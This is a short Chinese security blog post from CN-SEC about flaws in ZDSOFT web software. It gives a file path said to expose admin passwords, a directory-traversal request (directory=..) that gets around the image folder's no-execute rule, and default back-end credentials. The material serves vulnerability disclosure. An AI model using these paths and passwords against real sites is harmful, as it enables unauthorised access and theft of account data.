/images/database/admin.xml
可以看到管理用户账户密码
editor/dialog/selectPageBg.aspx?position=&directory=..
变量directory是路径,..表示跟目录,绕过Image目录无执行权限
后台默认密码:zdsoft 123 zdsoft admin
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
- 本文由 没穿底裤 发表于 2020年1月1日04:32:45
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
ZDSOFT 漏洞http://cn-sec.com/archives/75380.html
评论